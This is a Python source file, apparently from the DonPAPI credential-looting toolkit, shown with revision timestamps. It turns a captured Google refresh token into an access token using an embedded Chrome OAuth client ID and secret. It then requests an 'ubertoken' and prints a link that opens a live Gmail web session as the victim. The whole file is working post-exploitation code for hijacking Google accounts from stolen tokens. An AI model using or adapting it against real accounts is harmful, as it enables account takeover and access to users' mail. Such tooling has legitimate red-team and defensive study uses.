DonPAPI/utils/google_refresh_token.py

110 lines
3.7 KiB
Python
Raw Permalink Normal View History

2023-12-11 10:11:09 +00:00
'''
// Call refreshToken which creates a new Access Token
access_token = refreshToken(client_id, client_secret, refresh_token)
// Pass the new Access Token to Credentials() to create new credentials
credentials = google.oauth2.credentials.Credentials(access_token)
// This function creates a new Access Token using the Refresh Token
// and also refreshes the ID Token (see comment below).
'''
import argparse
import sys
import requests
def refreshToken(client_id, client_secret, refresh_token):
2024-04-15 15:00:25 +00:00
params = {
"grant_type": "refresh_token",
"client_id": client_id,
"client_secret": client_secret,
"refresh_token": refresh_token
}
authorization_url = "https://oauth2.googleapis.com/token"
r = requests.post(authorization_url, data=params)
if r.ok:
return r.json()['access_token']
else:
return None
def get_token_info(id_token):
endpoint = "https://oauth2.googleapis.com/tokeninfo?id_token={}"
r = requests.get(endpoint.format(id_token))
debugprint("[-] Raw response: {}".format(r.text))
if r.ok:
print("[+] Get valid access_token for {}\n".format(r.json()['email']))
else:
print("[x] Error")
debugprint(r.text)
2023-12-11 10:11:09 +00:00
def refreshToken2(client_id, client_secret, refresh_token):
2024-04-15 15:00:25 +00:00
params = {
"grant_type": "refresh_token",
"client_id": client_id,
"client_secret": client_secret,
"refresh_token": refresh_token
}
authorization_url = "https://www.googleapis.com/oauth2/v4/token"
r = requests.post(authorization_url, data=params)
debugprint("[-] Raw response: {}".format(r.text))
if r.ok:
debugprint(f"[-] access_token: {r.json()['access_token']}")
debugprint(f"[-] scope: {r.json()['scope']}")
debugprint(f"[-] id_token: {r.json()['id_token']}")
get_token_info(r.json()['id_token'])
return r.json()['access_token']
else:
return None
2023-12-11 10:11:09 +00:00
def get_decryption_key():
2024-04-15 15:00:25 +00:00
#https://devicepasswordescrowforwindows-pa.googleapis.com/v1/getprivatekey/<resource_id >
#Todo
#https://www.bitdefender.com/blog/businessinsights/the-chain-reaction-new-methods-for-extending-local-breaches-in-google-workspace/
return 1
def get_ubertoken(access_token):
# https://gist.github.com/arirubinstein/fd5453537436a8757266f908c3e41538#code
endpoint = "https://www.google.com/accounts/OAuthLogin?source=ChromiumBrowser&issueuberauth=1"
target = "https://accounts.google.com/TokenAuth?auth={}&service=mail&continue=http://mail.google.com/mail"
headers = {"Authorization": "Bearer {}".format(access_token)}
r = requests.get(endpoint, headers=headers)
if r.ok:
return target.format(r.text)
else:
debugprint("[x] Error when requesting ubertoken")
debugprint(r.text)
return None
2023-12-11 10:11:09 +00:00
def main():
parser = argparse.ArgumentParser(add_help = True, description = "Get Google Service Token")
parser.add_argument('-d','--debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t', '--token', help='token')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
2024-04-15 15:00:25 +00:00
global debugprint
debugprint = print if options.debug else lambda *a, **k: None
2023-12-11 10:11:09 +00:00
client_id = '77185425430.apps.googleusercontent.com'
client_secret = 'OTJgUOQcT7lO7GsGZq2G4IlT'
refresh_token = options.token
2024-04-15 15:00:25 +00:00
access_token = refreshToken2(client_id, client_secret, refresh_token)
print(f'[+] Access_token: {access_token}\n')
ubertoken = get_ubertoken(access_token)
print(f'[+] Click on this link to get a websession for this user: {ubertoken}\n')
return access_token
2023-12-11 10:11:09 +00:00
if __name__ == "__main__":
2024-07-05 13:47:43 +00:00
main()